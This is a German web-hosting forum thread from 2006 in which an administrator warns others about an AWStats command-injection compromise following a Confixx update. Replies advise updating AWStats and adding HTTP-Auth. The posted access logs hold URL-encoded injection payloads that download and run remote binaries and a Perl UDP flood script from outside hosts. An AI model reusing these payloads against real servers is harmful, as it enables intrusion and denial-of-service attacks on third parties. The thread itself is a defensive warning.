Achtung sicherheitslücke nach confixx update durch awstats.pl

[st-cb]

Hallo zusamen,

wir haben in der letztenwoche ein update von confixx gemacht (3.2). Nach diesem update hatte man awstats zur verfügung.

Heute wurde eine DOS atacke von unserem server gefahren. Es wurde eine sicherheitslücke in awstats genutzt.

hier mal meine logs zu diesem Thema:

Code: Select all

211.144.36.140 - - [21/Jul/2006:11:03:42 +0200] "GET //cgi-bin/awstats.pl?configdir=%7cecho%20%3becho%20b_exp%3bcd%20%2ftmp%3bls%20%2dall%3buname%20%2da%3becho%20e_exp%3b%2500 HTTP/1.1" 200 5677 "-" "-"
211.144.36.140 - - [21/Jul/2006:11:05:50 +0200] "GET //cgi-bin/awstats.pl?configdir=%7cecho%20%3becho%20b_exp%3bcd%20%2ftm%3bwget%20vodoo%2ebe%2fbin%2fhttpd%3bchmod%20%2bx%20httpd%3b%2e%2fhttpd%3becho%20e_exp%3b%2500 HTTP/1.1" 200 526 "-" "-"
211.144.36.140 - - [21/Jul/2006:11:07:22 +0200] "GET //cgi-bin/awstats.pl?configdir=%7cecho%20%3becho%20b_exp%3bcd%20%2ftm%3bls%3becho%20e_exp%3b%2500 HTTP/1.1" 200 505 "-" "-"
211.144.36.140 - - [21/Jul/2006:11:08:42 +0200] "GET //cgi-bin/awstats.pl?configdir=%7cecho%20%3becho%20b_exp%3bcd%20%2ftmp%3bwget%20vodoo%2ebe%2fbin%2fhttpd%3bchmod%20%2bx%20httpd%3b%2e%2fhttpd%3becho%20e_exp%3b%2500 HTTP/1.1" 200 544 "-" "-"
211.144.36.140 - - [21/Jul/2006:11:04:51 +0200] "GET //cgi-bin/awstats.pl?configdir=%7cecho%20%3becho%20b_exp%3bcd%20%2ftmp%3bchmod%20%2bx%20miro%3b%2e%2fmiro%3becho%20e_exp%3b%2500 HTTP/1.1" 200 568 "-" "-"
211.144.36.140 - - [21/Jul/2006:11:30:28 +0200] "GET //cgi-bin/awstats.pl?configdir=%7cecho%20%3becho%20b_exp%3bkillall%20%2d9%20udp%2epl%3becho%20e_exp%3b%2500 HTTP/1.1" 200 490 "-" "-"
211.144.36.140 - - [21/Jul/2006:11:30:52 +0200] "GET //cgi-bin/awstats.pl?configdir=%7cecho%20%3becho%20b_exp%3bps%20ax%3becho%20e_exp%3b%2500 HTTP/1.1" 200 7126 "-" "-"
211.144.36.140 - - [21/Jul/2006:11:28:10 +0200] "GET //cgi-bin/awstats.pl?configdir=%7cecho%20%3becho%20b_exp%3bcd%20%2ftmp%3bwget%20http%3a%2f%2fwww%2emoused%2eas%2ero%2fudp%2epl%3bperl%20udp%2epl%2069%2e218%2e96%2e233%2022%200%3becho%20e_exp%3b%2500 HTTP/1.1" 200 6 "-" "-"
211.144.36.140 - - [21/Jul/2006:11:38:17 +0200] "GET //cgi-bin/awstats.pl?configdir=%7cecho%20%3becho%20b_exp%3bps%20ax%3becho%20e_exp%3b%2500 HTTP/1.1" 200 6163 "-" "-"
211.144.36.140 - - [21/Jul/2006:11:39:40 +0200] "GET //cgi-bin/awstats.pl?configdir=%7cecho%20%3becho%20b_exp%3bcd%20%2ftmp%3bwget%20http%3a%2f%2fwww%2emoused%2eas%2ero%2fudp%2epl%3bperl%20udp%2epl%20195%2e242%2e244%2e1%208080%200%3becho%20e_exp%3b%2500 HTTP/1.1" 200 6 "-" "-"
211.144.36.140 - - [21/Jul/2006:11:45:03 +0200] "GET //cgi-bin/awstats.pl?configdir=%7cecho%20%3becho%20b_exp%3bcd%20%2ftmp%3bwget%20http%3a%2f%2fwww%2emoused%2eas%2ero%2fudp%2epl%3bperl%20udp%2epl%20195%2e242%2e244%2e1%208080%200%3becho%20e_exp%3b%2500 HTTP/1.1" 200 6 "-" "-"

Im verzeichnis /var/tmp/ wurde ein vezeichnis "b" gefunden in diesem befinden sich folgende dateien:

Code: Select all

1
2
3
bash
fuckzrullz.seen
go
pico
raw.levels
raw.pid
raw.set
wannadie.seen
wannafuckz.seen

alle die dieses update installiert haben sollten also mal ihre logs ansehen.


st-cb

[duergner]

Welche AWStats Version ist das denn? Und vor allem ... wenn du etwas die entsprechenden Mailinglisten oder hier im Forum gelesen haben solltest in letzter Zeit, dann solltest du wissen, dass man awstats.pl nur verwenden will wenn man den Zugriff per HTTP-Auth gesichert hat oder man laesst AWStatst die statischen Seiten erzeugen.

[oxygen]

Das Problem hat nichts mit Confixx zu tun.

awstats hatte eine Sicherheitslücke, die iirc schon vor über einem halbe Jahr geschlossen wurde. Wenn man einigermaßen regelmäßig die Updates die Distributionen zu Verfügung stellen, einspielt, hat man keine Probleme.

[st-cb]

Das Problem hat nichts mit Confixx zu tun.

awstats hatte eine Sicherheitslücke, die iirc schon vor über einem halbe Jahr geschlossen wurde. Wenn man einigermaßen regelmäßig die Updates die Distributionen zu Verfügung stellen, einspielt, hat man keine Probleme.

confixx hat schon ein update für einen anderen fehler in awstats - diesen kannten sie noch nicht.


updates etc werden regelmäßig gefahren.

[st-cb]

@ duergner: ich gehe mal davon aus das es mehrerer user hier gibt die confixx wegen awstats updaten und nicht sofort an das absichern denken - deshalb dieses posting.


ich habe per yast awstats - Advanced Web Statistics Version: 6.0-22 Installed: 6.0-22 Size: 2.3 MB insatlliert.

denn unser server wurde gespertt - und das möchte ich für andere vermeiden.

[kama]

Hallo,

ich habe per yast awstats - Advanced Web Statistics Version: 6.0-22 Installed: 6.0-22 Size: 2.3 MB insatlliert.

Ist die 6.0 nicht ein wenig alt? Es gibt doch schon seit Januar 6.5 von AWStats oder hat das einen anderen Grund?

Mfg
Karl Heinz Marbaise

[rootsvr]

Suse 9.1 wenn ich das recht sehe.. ggf mal nen generelles Update machen?

Ansonsten wie die Vorredner gesagt haben: immer fleissig Mailinglisten lesen und schauen ob es schwachstellen für die eigenes Software gibt. Nur nen Update via yast hilft nicht immer.

phpbb bei debian ist glaube ich 2005 das letzte mal aktualisiert worden..